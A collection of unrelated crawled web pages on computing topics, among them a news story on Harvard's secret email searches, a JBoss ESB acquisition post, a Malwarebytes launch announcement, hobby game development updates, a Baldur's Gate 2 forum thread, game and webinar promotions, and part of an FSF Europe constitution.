A dean at Harvard University who led a probe into leaked information in a cheating scandal admitted Tuesday that she failed to report two secret searches of a fellow dean's email accounts.At a meeting of the university's Faculty of Arts and Sciences (FAS), Dean Evelynn M. Hammond disclosed that she authorized two email searches that she failed to report to the dean of the FAS, Michael D. Smith.By failing to report those searches, they were omitted from a communication issued by the university on March 11, after news of the email searches, conducted last fall, was revealed in the Boston Globe.In a prepared statement, Hammonds explained that one of the unreported searches was conducted to determine if the dean who leaked an internal document had any contact with two students involved in the cheating scandal.The other search was of the suspected dean's personal email account at the university for subject line information, and the student's names. Previously, the university said only the administrative email accounts of the 16 deans suspected of leaking information to the Globe and Harvard Crimson were searched for information."Let me be clear, no emails were opened and no content was searched," she told those attending the meeting. "This search was conducted because I was concerned that the deliberations of the [FAS Administrative Board] had been compromised and that this loss of confidentiality would result in reputational damage to students whose cases were under review, and undermine our process on ensuring that all students get a fair hearing."Harvard President Drew Faust also addressed those attending the FAS forum. She found the university's policies regarding electronic communication wanting. "[W]e have highly inadequate institutional policy and process around the rapidly and constantly evolving world of electronic communication," she said. "We have multiple policies across the university that vary across schools, with some faculties lacking any explicit policies at all."That lack of university policies in the electronic realm, she observed, "constitutes a significant institutional failure to provide adequate guidance and direction in a digital environment that is a powerful and rapidly changing force in all of our lives."[See also: Privacy war heats up between ACLU, DOJ]Those kinds of policies are important for a copasetic workplace. "When an employer engages in a search of employee email, they have to be very careful to set out the terms of what they're doing internally and to make sure their agents are following the rules -- otherwise you can get yourself into quite a mess," said Neil Richards, a professor of law at Washington University in St. Louis.The people ordering a search also need to be on the same page as those conducting the search. "Administrators have to have a grasp of technology and IT people have to embrace privacy as a professional value," Richards added.An institution investigating an internal data breach has a dilemma. "If I call you and say, 'We're going to look through your email because we think you did something wrong,' you may go and clean up the evidence," said Mike Corn, chief privacy and security officer at the University of Illinois in Urbana-Champaign."If there's an investigation going on that's sensitive and could involve unethical behavior, does our obligation to treat you respectfully trump our obligations to the investigation?" Corn asked."That's a very nuanced and difficult question to answer without a specific context," he continued, "but it goes to the heart of the Harvard matter."In explaining why she failed to report the two searches when contributing to the March 11 apology statement, Hammond said she failed "to recollect the additional searches."That's disquieting, said Robert L. Shibley, senior vice president for the Foundation for Individual Rights in Education (FIRE) in Philadelphia. "If that's true, that's very disturbing," he told CSO. "What it suggests is that reading emails at Harvard is so common that it's not even worth remembering.""I would like to think that if a university is going to be scanning emails that would be unusual enough that you'd remember all the investigations that you've done," Shibley added.Read more about data privacy in CSOonline's Data Privacy section.
Tags: Security,
Tip: use spacers when you upgrade a motherboard | 计算机 |
2015-48/3681/en_head.json.gz/8341 | JBoss acquires enterprise-ready ESB Posted by
Mark Little Jun 15, 2006
After several months of discussions around the right architecture for a SOA infrastructure for the 21st Century and much community involvement, an alpha version of JBossESB was released in March which outlined many of the architectural principles. We've had great feedback from community developers, partners and prospective customers, all of them endorsing the approach we're taking: that JBossESB is a SOA infrastructure supporting best-of-breed deployments based on JEMS and partner technologies. However, the one thing that we were having difficulty on was keeping up with interest and demand: everyone wants JBossESB yesterday. In the week following the closure of the Redhat deal, the JBoss division has made a strategic move to address that deficiency with the acquisition of the Rosetta ESB. Rosetta is an ESB that's been in production deployments for over 3 years, handle tens of thousands of real-time and batch processing events from legacy and J2EE applications, insurance underwriting and real-time quote requests. Although Rosetta doesn't match the architecture the ESB team have been working on, it is close enough that with concerted effort we'll soon be in a position to provide a production-ready version of JBossESB that will become the premier development and deployment platform for SOA in the industry. What we have done up to this point is lay the foundations for that platform. With this acquisition, we are building on those strong foundations and pushing the community effort into a new and important phase. It's worth spending a few moments just to consider exactly what it is that Rosetta brings to JBossESB: support for a variety of messaging services, including JBossMQ and MQSeries; a transformation engine to bridge data formats; a service registry; a persisted event repository to support governance of the ESB environment; a base transport mechanism; pluggable architecture; and a notification service to allow the ESB to register events and signal subscribers. All of this in a product that has been running continuously for 3 years: a pedigree and level of trust that is difficult to find elsewhere in this new and emerging market. Another part of this Rosetta acquisition is that I'm happy to announce that Esteban Schifman, Chief Architect at Heuristica and part of the team that developed Rosetta, will be joining the JBossESB team. As well as his Rosetta knowledge, Esteban brings a great deal of experience in this space which will be critical for Redhat's success with JBossESB. I'd like to welcome Esteban to a great community of like-minded developers and users: I'm sure he'll find it as stimulating as the rest of us. Finally, just to recap and briefly indicate where we are going next. JBoss has been making good progress in the SOA space with JEMS and early work on JBossESB; we've seen significant take-up of our technologies and ideas by customers and partners alike. Now that we've acquired Rosetta, we'll be able to accelerate our plans for delivering on the architectural goals we have developed and hopefully benefit the community at large with the preeminent SOA platform we all agree is needed. Redhat is uniquely poised at this stage to deliver on that requirement with JBossESB. We'll have a beta version available in the next few months and a GA ready by the end of the year. If you're at JBoss World Vegas then come and hear my talk on the subject. One last thing: if you're interested in participating, please get in touch! This is a thriving community, but there's always room for more involvement. | 计算机 |
2015-48/3681/en_head.json.gz/8422 | Deutsch Español Français Italiano Português (Portugal)
Nederlands Polskie Pусский Search Malwarebytes Press Center
For Home Malwarebytes Anti-Malware Free
Malwarebytes Anti-Malware Premium
Malwarebytes Anti-Malware for Mac
Malwarebytes Anti-Exploit Free
Malwarebytes Anti-Exploit Premium
Malwarebytes Anti-Malware Mobile
Other ToolsSee all
For Business Malwarebytes Anti-Malware Remediation Tool
Malwarebytes Anti-Malware for Business
Malwarebytes Anti-Exploit for Business
Malwarebytes Endpoint Security
Downloads Products
Awards/Testimonials
Support Consumer Support
Language Select English Deutsch Español Français Italiano Portuguëse (Portugal)
Portuguëse (Brazil)
Nederlands Polskie Pусский Malwarebytes Press Center
Malwarebytes Anti-Malware 2.0 launches to proactively protect home PCs from advanced stealthy malware
New 2.0 version of anti-malware software which fixed 208m PCs last year, combines five powerful new tools into a single download and commits to XP support
San Jose: Malwarebytes today announces the launch of Malwarebytes Anti-Malware 2.0, a new tool designed to proactively protect home PCs against advanced criminal software which traditional anti-virus cannot detect. In development for over 18 months, Malwarebytes Anti-Malware 2.0 is the first completely new version of the company’s flagship security software for six years, and is designed to work alongside traditional antivirus to provide additional protection.
Malwarebytes Anti-Malware 2.0 will continue to support XP users, who currently make up 20% of Malwarebytes’ user-base and could be at greater risk when updates stop on April 8.
The new product brings together five powerful technologies in a lightweight 16MB download for the first time, the combination of which provides dynamic protection from advanced threats. At its core is a new heuristics engine, designed to detect and kill malicious software based on behavior. This means protection is not reliant on slow-moving signatures, providing defense against zero-day attacks.
Malwarebytes Anti-Malware 2.0 also integrates new Anti-Rootkit technology, which rips out and fixes the damage done by malicious software hiding at an extremely deep-level in the operating system. Malwarebytes’ Chameleon is also built-in, allowing Malwarebytes Anti-Malware 2.0 to brute force start-up and scan when malware is crippling traditional security software and other processes.
Malwarebytes Anti-Malware Premium, which replaces the acclaimed Malwarebytes Anti-Malware PRO, added updated malicious URL blocking and enhanced protection from unwanted programs such as aggressive adware and toolbars. A new user interface and ultra-quick threat scan ensure the product is easy to use.
Marcin Kleczynski, founder and CEO of Malwarebytes, said, “Six years after the launch of the first version, and following 18 months of development and countless research hours, we are thrilled to announce Malwarebytes Anti-Malware 2.0.
“It has been a real labor of love. We are proud of what we have created and believe it builds upon the success of our existing products to give people a strong proactive countermeasure against today’s advanced online threats.”
The new product does not replace Malwarebytes’ acclaimed free clean-up tool, which the company has committed to providing for free forever.
Malwarebytes Anti-Malware Premium is available from the online store for an annual subscription of $24.95, and provides coverage for up to three PCs. Users with existing lifetime licenses for Malwarebytes Anti-Malware PRO will receive a free upgrade to the new product.
About Malwarebytes
Malwarebytes provides software designed to protect consumers and businesses against malicious threats that consistently escape detection by other antivirus solutions. Malwarebytes Anti-Malware Pro, the company’s flagship product, employs a highly advanced behavior-based detection engine that has removed more than 5 billion malicious threats from computers worldwide. Founded in 2008, the self-funded company is headquartered in California, operates offices in Europe, and employs a global team of researchers and experts. For more information, please visit us at www.malwarebytes.org.
All product names and trademarks are the property of their respective firms. Back to top
Keep up on the latest news and offers
Malwarebytes Anti-Malware Free
Malwarebytes Anti-Exploit
Malwarebytes Anti-Malware Remediation Tool
Malwarebytes Techbench
© 2015 Malwarebytes | Privacy Policy | Terms of Service | EULA | 计算机 |
2015-48/3681/en_head.json.gz/9041 | AboutCommunity
DocManager
TaskManager
Cvs Tree
Release 0.02a
---Posted by redwagon at 01:49 AM on August 17, 2004
That's right!! We are releasing our second official build of the game, and the team has made some really nice progress over the past months.
http://pizzagame.sourceforge.net/index.php?area=downloads
Ares has put together a solid framework to manage the control of the customers and employees in the game. They visit the restaurant, find their way around walls, walk through doorways, sit at tables, take customer orders at tables, and cook pizzas. I can't wait to see some new character models and animations to compliment Ares' coding skills.
Also, All_Star25 has been making some nice strides with the sound engine. So much that we are able to provide some cool background music in the game, which has been provided by Alex Ford.
Last but hopefully not least, I have been able to complete the base framework for some basic Lua scripting functionally to manage the restarant furniture and appliances.
As always, do feel free to make comments or offer suggests in the project forum.
---Posted by Ares at 08:51 PM on July 08, 2004
Work on the game continues to move along steadily. I am continuing to make progress on the simulation - bits and pieces of it are at a state of completion where they are working in a rudimentary way, notably: the code that is used to guide customers from an entry point to an available table with chairsthe code for directing an employee to wait on customers sitting at a tablethe code for directing an employee to prepare a pizza on a counter While the game is still not near a playable state, some of our progress is becoming somewhat more visible. Also, all_star25 has been making some progress on creating a working sound engine for the game to enable the playback of sounds and music using OpenAL and Ogg Vorbis. If you have any suggestions or ideas, or simply just have a comment about the game, please visit and make a post in our forums
May Update - Pizza Game
---Posted by Ares at 07:02 PM on May 16, 2004
There's a few interesting new things to show since our last update. Firstly, redwagon has done a lot of work on the new GUI. Also, we've gotten the game working with the newest version of OGRE, the graphics engine that we're using for the game. The most notable improvement in the newest version (0.14) is the addition of various shadowing techniques.
Both the new GUI and the addition of shadows can be seen in this screenshot.
If you have any comments, suggestions, or questions concerning the game, please be sure to visit our forums.
March Status Update
---Posted by Ares at 10:51 PM on March 19, 2004
There's not a lot to report. redwagon has been busy with preliminary work on putting together the GUI that will be used in the final game. I've been doing a bit of work on some of the pieces of the simulation. In general, though, there has been progress - just not visible progress. Once redwagon and I feel that enough progress has been made, we'll likely release another (pre)alpha version of the game for anyone who's interested to try out. Just keep in mind that a lot of the work we're doing is stuff that is necessary but won't really be visible to someone just looking at the game. We'll keep you updated on any interesting progress; if you have any questions or suggestions please be sure to visit our forums.
Pizza Game February Update
---Posted by Ares at 05:07 PM on February 22, 2004
Firstly, I apologize for the month long delay between news postings. However, I assure you that this game is not dead, nor will it die in the forseeable future. Things are still moving along although, at times, we move along more slowly than we'd prefer. We don't have that many new things to report, as this past month both redwagon and I have often been unable to find that much time to work on the game. redwagon has begun work on the GUI system that will be present in the playable game, as opposed to the temporary GUI found in our current releases. I have gotten a little more work finished on some of the basic simulation stuff that is required for us to make available a playable game - not as much as I had hoped, but enough to keep us moving forward. That's about all the news I can think of, but I promise to try and post news at least a little more often than once a month.
Pizza Game January Update
---Posted by Ares at 11:39 AM on January 23, 2004
This is just an update to let you know what's been happening with the game. I've begun working on the actual simulation for the game, involving customer and employee tasks. This is the stuff that will allow the employees and customers to act autonomously and perform their jobs - wait tables, cook pizzas, etc.
I've finished integrating the OpenSteer Library into the game. Entity movement and avoidance of each other now uses the library.
redwagon has integrated the latest OGRE release (0.13) into the game. (Ogre is the graphics engine that we're using).
We've also uploaded a new "Latest Build" for you to try out. We only have the Windows version up right now, and it doesn't include some of the things that I've mentioned above
First Linux Release
---Posted by redwagon at 11:16 PM on December 16, 2003
For the past month, the game has been completely compatible with the Linux Operating System; however, most of the developers are primarily Windows based users and supported the game only under the Microsoft platform until now.
Today, we are proud to announce the very first Linux version binaries of the project, which is still in the early development stages. They are available on the downloads page. We encourage those individuals who have any trouble or suggestions to post in the forum.
Pizza Game Update
Development is moving forward at a nice and steady pace.
The latest addition to the game is the embedding of glass windows into the walls. It is still a bit new and requires some additional work. Imagine if sun rays would cast light into the restrauant structure through the windows; that would look amazing.
We are looking forward to the next release of OGRE, an amazing open-source graphics engine. Hopefully one of its features will include the the use of shaders; then, we will have the capability of easily creating a richer game scene with realistic lighting and shadows.
And last but not least, we have been discussing the official name for the game, and we are juggling one title in particular. 'Pizza Game' has been a temporary reference to the project since its incarnation. So, bare in mind that the project will have an official name soon.
---Posted by Ares at 12:54 AM on November 15, 2003
Even though it's been two months since our last news update, we haven't been slacking off. redwagon has implemented a lot of stuff regarding objects - you can now place various objects in the scene, rotate them using the mouse, move them again after you've placed them, and remove them entirely from the scene. Also of note is that the system that redwagon has come up with is very modular - an object can be added to the game by providing a model of the object and a text file describing the object.redwagon and I also spent a good deal of time the last few days making sure the game compiled and worked properly under Linux. We ran into numerous problems at the code-level that needed to be resolved in order to have the game compile properly. Both redwagon and I were able to solve these problems, however, and got the game to compile properly. We've also had some success getting the game to run - we're having one particular problem, but that's most likely due to our relative inexperience under Linux, as both redwagon and I run Windows as our main development operating system. Nevertheless, we are absolutely insistent that this game run under both (at least) Windows and Linux: we hope that the time we took away from programming the game to make sure that there were no problems with the game under Linux reflects this. Lastly, I have begun initial programming on the simulation engine for the game, so hopefully there will be more news regarding that in the weeks to come. If you're interested in the game, be sure to check out our (albeit somewhat dated)Development Release from September. Or, if you really want to see the more recent progress, check out our Latest Build. One caveat about the latest build, though, we cannot guarantee that it will be stable or even run, although in most cases it will be somewhat stable.
First Developer Build Release
---Posted by redwagon at 08:29 PM on September 17, 2003
In an effort to adhere to the traditional opensource software policy of "Release early, release often", we will provide links to a bi-weekly build of the game starting today. I must stress that these unofficial releases are the most recent stable developer builds and are far from complete, but they will show the progress of the game throughtout its development.
Download the Windows version!
Again, this build is a very early alpha. So far the game includes: building walls, applying wallpaper textures, applying floor textures, adding a few objects to the scene, and a robot that walks intelligently around in the game. Try trapping the robot in a room.
Also, I have added a few more screenshots to the website.
Still Chuggin'...
It has obviously been a whole month since our last news posting, so I thought it was definitely overdue for an official update on the status of the project. Unlike as it might appear, the project is still in active development and huge progress is made almost each day.
A few weeks back, we determined that our methods of generating a 3D scene with the aid of the OGRE rendering engine were inappropriate for the complex atmosphere we are trying to create for this game. Thus, application performance suffered heavily and required replanning and newer methods of interacting with OGRE to acheive the results we desire. Of course, this necessity has set us back a bit, but it is well worth the time and effort. In a relatively simplistic 3D scene, we would achieve about 30-40 fps. Now with the improvement we have made, we are able to create the same 3D scene under the same hardware and resolution running at approximately 90-100 fps leaving us with extra frames to kill to improve the game's overall graphical appearance.
So, that is how the project stands now. We are in good shape, the game improves each day, and we will definitely show some new screenshots within the coming weeks.
Pizza Game Status Update
It's been a while since our last update and there's some new news and information. First, we have added a screenshots section to the site. Every once in a while, I'll add screenshots of the game to that section so you can easily track our development simply by looking at the pictures.
What are we currently working on? Well, yesterday I finished up the core of the pathfinding system for the game. After fixing numerous very subtle bugs in things related to the pathfinder (interestingly, none of which were in the actual implementation of the pathfinding algorithm itself) and spending much time with Visual Studio's excellent debugger, the pathfinder is stable and working. Collision detection with walls and doorways is working as well.
Johnny(mhead) has been working on things related to the "build mode" of the game. Already, he has basic wall placement, wall texturing, and tile texturing completed (with only one outstanding "bug" in the wall texturing).
Essentially, we are still working on much of the "core" game code, rather than the really game-specific things. However, more and more of the game engine foundation is being completed and implemented, and our progress has been very good. Check back once in a while - I'll try to update our progress more often. I'll also be sure to constantly add new screenshots to the screenshot gallery.
First signs of progress
---Posted by redwagon at 10:57 PM on June 19, 2003
Although the game is still in the very early stages of development, we have made considerable progress. It is actually starting to look like a real modern video game. We are so excited and are pleased to share a couple of screenshots.
In the first screenshot, you can see a model we borrowed from Ogre. Keep in mind that the screenshot does not convey the total coolness from watching the character walk in an animated way across the tile map. The screenshot also shows how the player is allowed to interactively place walls along the edges of the tiles indicated by the green semi-transparent wall.
The second screenshot shows the same scene. Notice the change in position and direction of the robot character. Hey! Arn't there a few walls in the scene missing?!?
Pizza Game in Full Development
---Posted by Ares at 08:25 PM on June 16, 2003
Pizza Game has been out of the design stage for about a week now and is under full development. We are currently making excellent progress - no problems have appeared in our design. While the game is still in a very early stage and there's not a whole lot to see, I have some screenshots of the game to share. Keep in mind that we haven't even finished coding the underlying framework for the game. In screenshot 1, we can see an empty "tile map." The grid lines are drawn on for reference. What you see in the screenshot is the "empty lot" upon which you will be able to build a restaurant. Upon this grid you will be able to place walls, doors, furniture, ovens - all the things that are necessary for a pizza restaurant. Screenshot 2 shows the tilemap after having several walls added. Although the walls are just white right now, in the finished game you will be able to apply a variety of different wallpapers to the wall.
The game will provide you, the player, with a free camera. What does this mean? We'll you'll be able to place the camera wherever you want in the restaurant. For example, in screenshot 3 you can see that the camera is zoomed out.
Screenshot 4 and and Screenshot 5 show two different views of the restaurant from "inside" and at ground level.
Be sure to keep in mind that this is a very, very early look at the game. However, we figured that it would be a good idea to show everyone what we've been up to.
The general game design for Pizza Game has been pretty much finalized and we have begun work on the technical design of the game. An object design using UML has begun to take shape and we've been slowly working through technical issues that we need to address in the design. What's taking us so long you might ask? Well, even seemingly "simple" technical issues can often become troublesome if we try to create a design that is both robust and flexible. We are, nevertheless, making excellent progress. But whatever anyone might tell you, or what you may believe - creating a game is not easy.
Welcome to the Pizza Game Website
Born out of the Pizza Business Project, Pizza Game takes the concepts and ideas introduced in Pizza Business and takes them to the next level. Whereas Pizza Business is a text-based, turn based, non-graphical pizza restaurant management game, Pizza Game will be a modern, 3D, real-time game. The game right now has no official title; therefore, we have chosen to call the game by the name "Pizza Game" until we can come up with an appropriate name for the game.
Pizza Game has actually been in a conceptual development phase for about two months. Over the next few weeks, we hope to start finalizing a game design and begin working on the technical aspects of the game. You can check up on the progress of the game through news posts on this website, through articles related to the development of the game that we will write, and through the forums. Please join the forums and lend your voices, suggestions, and ideas to the development of Pizza Game and be sure to check back here often: development on the game should soon shift into high gear.
How Did You Find Out About "Pizza Game"?Through Sourceforge.netThrough a Link on Another WebsiteThrough a Development MemberThrough a Search Engine/By AccidentResults | 计算机 |
2015-48/3681/en_head.json.gz/9587 | » Forums » OUR ARCHIVES » ARCHIVED RPG'S, ACTION & MORE » Baldur's Gate 2
Baldur's Gate 2
grandpa68
Loc: Antelope Valley, So CA, USA
I have set up a trade for this game from GTZ but I have some questions about it first. Will it work on windowsXP? How is it different from Baldur's Gate that I am playing now? Do I need any patches for this game?
Keep smiling and the world will smile with you.-------------------
Re: Baldur's Gate 2
Yes, BG2 will work in Winxp. [I know this because I'm playing it right now on WinXP].Luckily, there is an update function on the laucn screen. You just need to click on the BG2icon, and then chosse update. Or you can download the latest patches from bioware's site.[I think you need to go through their support page].BG2 (and throne of bhaal) is NOT that differentfrom BG1. There is some tecnichal stuff which is made easier. Travelling now rests your party, like sleeping does. (In the game's options menu there is an option to select 'rest until healed'.)Also, try to get Both BG2+Throne of Bhaal. [Sometimes you can get them in nice package together, I also think you can get a DVD version of BG2+Throne of Bhaal].
Adventure gaming is fun Top
Well, there are lots of things that are different, but much is the same.A few technical changes, better graphics, some more functions (such as casting healing spells automatically before resting), more spells and more options in general What differs most is the atmosphere and feel of the game itself. Baldur's Gate 2 has a rich storyline, wonderful characters (lots of banter), but is much more "concentrated" than Baldur's Gate was. Much fewer areas to explore, but more closely packed with quests and adventures. I strongly suggest you don't even start the game til you have finished Baldur's Gate, since it will be a huge spoiler. Glad to see another fall before the might of Baldur's Gate. Still the best RPG out there if you ask me.
Drizzt _________________________
You couldn't see that one coming, could you? _________________________
I forgot to mention that you can export your character (or party?) from BG1 to be used in BG2. Ver y nice feature, imo .I agree with Drizzt. You really should finish BG1 before playing BG2 --- for obvious reasons, to many spoilers...
Yeah. And make sure you keep those pantaloons from the Friendly Arm if you do import your character. The only annoying thing is that Baldur's Gate 1 does not allow for sub-classes, which means that if you started playing a certain class in BG1, you won't be able to access the new classes in BG2 if you import it.
Quote:Originally posted by Drizzt: You couldn't see that one coming, could you? Hehheh, and Drizzt SCORES! _________________________
lindy236
Loc: South Dakota
I just finished BG1 and now starting BG2. How do I export my character from BG1 to BG2? I really need step by step directions?ThanksLinda Top
I can't remember the exact process from the top of my head, but I think there is a folder in the BG2 folder named "char".BG and BG2 uses the same character system, so it's the same file types. When you finished the game, it makes a "final save" that saves everything with the XP you gained for killing Sarevok. This "final save" has a folder called e.g. "00038383-Final Save" or something in the BG1 folder called "saves". Copy that folder to your BG2 "saves" folder.Then from the character creation menu, choose "import" and then "from saved game". This will allow you to do so.You can of course also "export" a character from a BG save game. To do so, go to the character screen and then choose "export". This will save the PC as a cgr.-file in the BG1 "Char"-folder.Then simply copy that .chr file into BG2 "char"-folder and import it from there.Sorry if this was made a mess...I'll look into it more closely when I get home today. Need to go pretty soon, but I hope it will work anyway. _________________________
Drizzt, I recently took a BG 1 character into BG 2, and I think the first method did not work for me for some reason, but the second one did -- i.e. the Export character, and then moving the character folder into BG 2.For those of you that haven't played BG 2 before -- you're in for a great ride. BG 2 is one of the best games ever made. Here's just a little hint of what's to come...if a party member of the opposite gender starts being really nice, try being nice to them back, and see where it leads. The party member interactions in BG 2 are second to none. Enjoy!
Second to Ps:T, actually. As much as I adore BG, nothing beats that game in terms of character depth and interactions...Hagatha, I tried now and it worked for me. Those 10000Xps for Sarevok can be quite handy. What you need to do is as I said;1. Go into your BG/Save folder. Look for the folder called "(A number)-Final Save" and copy this into BG2/save.2. Go to character creation and choose import, then "Saved game" and then "Final Save", which will let you import your PC from that game.Good luck! _________________________
Thanks for the info. I gave it a try and it worked. Now I'n not sure it I want to continuewith my character or create a new one.Thanks again.
The one advantage to keeping your existing character is that he or she has read all those books that gave them permanent stat increases in BG1. However, the wide range of character classes in BS 2 is a lot of fun to play with. If you've just had a plain fighter all the way through BG1, in BG 2 you can now dual-class them, although as usual I would caution doing that until your fighter has grand mastery of one weapon. But if you have the TOB expansion, you'll get up to about level 35-40 depending on your character class, so dual-classing can give you a very interesting and powerful character.
Dual-classing as a Kensai-Mage makes you almost ridicolously powerful. But it's fun. _________________________ | 计算机 |
2015-48/3681/en_head.json.gz/9591 | Tropico 3 gets a new website
The official website for Tropico 3 is now online and waiting to dish information on the upcoming dictator simulator. The site features the usual array of community forums, screenshots, and videos. I'm disappointed there's not a developer diary told from the perspective of the dictator but that's just me. NFORMATION WILL NOT BE WITHHELD AS
THE OFFICIAL TROPICO 3 WEBSITE GOES LIVE
BALTIMORE, MD, September 22, 2009 – In the interest of full disclosure, El Presidente and Kalypso Media today removed the constraints of the limited Tropico 3 teaser site and launched the full featured official game site. No longer will those interested in the bananna republic be deprived of new information and assets, as the new official site has made all general information, screenshots, trailers and demo available in one easy to access location.
Developed by Haemimont Games, Tropico 3 brings the series back to its roots and puts players in the role of ‘El Presidente’, the two-bit dictator of a strategically positioned banana republic in the Caribbean during the time of the Cold War. Players assume control of every aspect of island life, deciding whether to unleash the army to secure their power base or lead their people to prosperity as a generous elder statesman. Will absolute power corrupt, or will the humanitarian approach spur progress? Find out this October as gamers become part of the political machinations of Tropico as they determine the fate of this island nation.
TROPICO 3 is being developed by Haemimont Games and will be available for PC on October 20, 2009 and on the Xbox 360 in early 2010. For more information, screenshots and videos please visit the official game website www.tropico3.com
About Kalypso Media
Specializing in the publishing of interactive media, primarily computer games, Kalypso Media was founded in summer 2006 by industry veterans Simon Hellwig and Stefan Marcinek. The following year, a sister company, Kalypso Media UK Ltd., was established in England and is currently led by Andrew Johnson and Charlie Barrett, two experienced members of the Kalypso Media Group management team. In 2009, Kalypso Media USA Inc. was established under the leadership of veteran video game executive, Deborah Tillett. Kalypso Media owns two development studios, Realmforge Studios GmbH and Gaming Minds Studios GmbH, both of which are located in Germany. For further information see www.kalypsomedia.com.
About Haemimont Games
Haemimont Games is an independent games development team brought together by a common passion: to thrill, engage and provoke gamers worldwide. Since 1997, the studio has developed eight original titles with numerous add-ons. It is currently working on Tropico 3 among others. More information on the company can be found by visiting www.haemimontgames.com. | 计算机 |
2015-48/3681/en_head.json.gz/9852 | MeriTalk - Where America Talks Government
Invite Friends | Forgot Password | Register
Mobile Work
August 23, 2012, 1 p.m. ET
CPE Credits:
Webinar attendees are eligible to receive continuing professional education (CPE) credits. Click Here for more details.
Add this event to my Outlook calendar
For more information, please contact us at [email protected]
The Customer is Always Right Webinar
With a pile of mandates, unprecedented data growth, and shrinking budgets, Federal IT has change ahead. What do the customers think? MeriTalk's 2012 "The Customer is Always Right" study for the first time asks IT's customers, Federal executives, how they view IT, how they leverage IT, and how their agencies are doing. On August 23, attendees learned:
Who are the top-ranked IT performers in Federal government, according to Fed execs?
What do Federal executives really want from IT?
How can your agency save with IT modernization/transformation? Do Federal executives see opportunity in data center consolidation, cloud computing, and Big Data? What steps are agencies taking to best support their customer's missions?
Featured speakers included:
Nicole Burdette, MeriTalk Fellow [moderator]
Brad Johnson, Director, EMC Consulting for Public Sector
Nitin Pradhan, Chief Information Officer (CIO), U.S. Department of Transportation
Nitin Pradhan
Mr. Nitin Pradhan was sworn in on July 6, 2009, as the Chief Information Officer for the U. S. Department of Transportation (DOT) as part of the Obama Administration. He is the Chief Advisor to Secretary Ray LaHood in all matters relating to information technology (IT). Pradhan provides IT vision, strategy, planning, policy, and oversight for DOT's $3 billion-plus IT portfolio. Pradhan is a business strategist, technology expert, coalition builder, and change agent with more than 20 years experience, including 11 years at the CXO level in government, startups, nonprofits, and private industry. His expertise is targeting new opportunities utilizing technology as a solution; advising operational managers in launching and promoting knowledge-centric products and services; and defining fundamental organizational transformation integrating entrepreneurship, innovation and technology, as well as institutional and partner knowledge. His focus is on Enterprise 2.0-based communications; collaboration and community-building; and information assurance, security, and privacy. Pradhan is also a strong proponent of building public-private partnerships. He was recently named to Information Week's "Government CIO 50: Driving Change in the Public Sector" for bringing a business person's point of view to management of DOT's IT strategy, policy, and implementation.
Prior to joining DOT, Pradhan was an IT executive at Fairfax County Public Schools, the 12th largest school district in the country. The district's IT department has been ranked in CIO Magazine's top 100 IT organizations and Computerworld's 100 best places to work in the nation. Before his time in Fairfax, Pradhan was the managing director of Virginia's Center for Innovation Technology, where his focus was on mentoring and growing technology startups and building research and innovation capabilities and capacity. He was also the co-founder and interim CEO of a wireless startup. Pradhan's educational qualifications include a Bachelor of Science in engineering and a Master of Business Administration in marketing from India, as well as a Master of Science in accounting from the Kogod College of Business at American University in Washington, DC.
Please complete the form below to view the archived webinar:
First Name Last Name Title Organization Phone Email Address Address 1 Address 2 City State Zip The Customer is Always Right Webinar attendees are eligible to receive continuing professional education (CPE) credits. Attendees can earn a maximum of 1 CPE credit in computer science. Additional details:
Delivery Method: Group Internet Based
Program Level: Intermediate
Prerequisites: No prerequisites required
Advance Preparation: No advance preparation necessary
Contact Whitney Hewson at [email protected] for details on obtaining CPE credits at The Customer is Always Right Webinar.
This event is a complimentary event. As such, refunds do not apply. For more information regarding our program cancellation policy or complaint resolution policy, contact Whitney Hewson at [email protected].
MeriTalk is registered with the National Association of State Boards of Accountancy (NASBA) as a sponsor of continuing professional education on the National Registry of CPE Sponsors. State boards of accountancy have final authority on the acceptance of individual courses for CPE credit. Complaints regarding registered sponsors may be submitted to the National Registry of CPE Sponsors through its website: www.learningmarket.org.
Copyright 2015 MeriTalk
About Us | Contact Us | Privacy Policy | Terms of Use | Incorrect please try again
Enter the words to the left: | 计算机 |
2015-48/3681/en_head.json.gz/10927 | عنّا
كن ناشطًا
تحذير: لم تُتَرجَم هذه الصفحة بعد. ما تراه أدناه هو النسخة الأصلية للصفحة. من فضلك راجع هذه الصفحة لتعرف كيف تساهم في الترجمة والمهام الأخرى. Constitution Preamble Upon entering the digital age, in which real and virtual space will equally determine the social, cultural and scientific development of mankind, the Free Software Foundation Europe has the long-term goal to raise and work on the questions this will necessarily raise. In this regard the direct function is the unselfish promotion of Free Software as well as creating and propagating the awareness of the related philosophical and social questions. As its acknowledged sister organisation, the FSF Europe will join forces with the Free Software Foundation founded by Richard M. Stallman in the United States of America. The latter, recognised tax-exempt charitable organisation in the USA, has been dedicating itself since 1984 to the promotion and distribution of Free software and in particular the GNU-System, a Unix-like operating system. This system is mostly known by one of its variants, GNU/Linux, which since 1993 has been used successfully on many computers. The term Free Software in the sense of the FSF Europe does not refer to the price, but rather to the following four freedoms: freedom: the freedom to use a program for any purpose freedom: the freedom to study the program and adapt it to your own needs. freedom: the freedom to make copies for others. freedom: the freedom to improve a program and make these improvements available to others, so that the whole community benefits. This definition of Free Software goes back to the idea of freely exchanging knowledge and ideas that can traditionally be found in scientific fields. Like thoughts, software is non-tangible and duplicable without loss. Passing feeds an evolutionary process, advancing thoughts and software. Only Free Software preserves the possibility to comprehend and build upon scientific results. For scientists, it is the only kind of software which corresponds to the ideals of a free science. Accordingly, the promotion of free software is also a promotion of science. The distribution of information and the forming of an opinion are done increasingly by digital media, and the trend is to foster the use of those means for a direct citizen participation to democracy. Therefore, a central task of the FSF Europe is to train proficient citizens in these media, thereby promoting democracy. Digital space (``Cyberspace''), with software as its medium and its language has an enormous potential for the promotion of all mental and cultural aspects of mankind. By making it commonly available and opening up the medium, Free Software grants equal chances and protection of privacy. Coining the awareness for the problems related to the digital age in all parts of society is long-term goal and a core aspect of the work of the FSF Europe. Therefore the FSF Europe will seek to increase the use of Free Software in schools and universities in order to parallelise the education in real space matters with the creation of understanding and awareness of problems in virtual space. Free Software guarantees traceable results and decision-making processes in science and public life as well as the individual rights to free development of personality and liberty of opinion. It is the job of the FSF Europe to carry Free Software into all areas that touch public life or ``informational human rights'' of citizens. Name, seat, financial year (1) The association bears the name ``Free Software Foundation Europe - Chapter (Name of State)'' from now on referred to as ``Chapter (Name of State).'' Additionally the name ``(Name in local language)'' can be borne. It is to be registered into the register of associations; after the registration it leads the additive ``e.V..'' (if necessary) (2) The association has its seat in (Name of City). (3) The financial year is the calendar year. Purpose, tasks, non-profit character (1) Purpose of the ``Chapter (Name of State)'' is the promotion of Free Software in order to further free exchange of 